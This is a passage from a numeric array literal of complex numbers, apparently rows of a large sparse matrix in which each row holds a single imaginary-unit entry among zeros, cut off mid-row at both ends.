0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
